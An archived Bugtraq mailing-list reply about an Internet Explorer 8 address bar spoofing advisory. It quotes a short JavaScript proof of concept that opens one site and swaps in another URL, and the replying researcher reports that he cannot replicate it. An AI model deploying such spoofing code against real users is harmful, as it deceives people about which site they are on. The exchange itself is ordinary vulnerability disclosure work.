New User, Welcome!     Login

Re: Internet Explorer 8.0 Address Bar Spoofing Vulnerability

From: Shreyas Zare <shreyas secfence com>
To: info securitylab ir
Cc: bugtraq securityfocus com
Subject: Re: Internet Explorer 8.0 Address Bar Spoofing Vulnerability
Date: Mon - Jul 26, 2010 09:34 AM


cant replicate it on my test setup. is something missing?

Shreyas Zare

Sr. Information Security Researcher
Secfence Technologies
www.secfence.com



On Sat, Jul 24, 2010 at 4:38 PM,  <info@securitylab.ir> wrote:
> Spoof Code:
>
> <script>
> function Spoof() {
>  oc=window.open('http://www.securitylab.ir/', '','location=1');
>  oc.location.replace('http://www.microsoft.com/');
> }
> </script>
> <p align="center">
> <a href="javascript:void(0);" onClick="Spoof()">Go to the Securitylab.ir</a></p>
>
>
> Discovered by: Pouya Daneshmand
> http://Securitylab.ir/Advisories
>




Copyright © 1995-2012 LinuxRocket.net. All rights reserved.

Nearly all of LinuxRocket's features are free. Be kind and donate to the cause!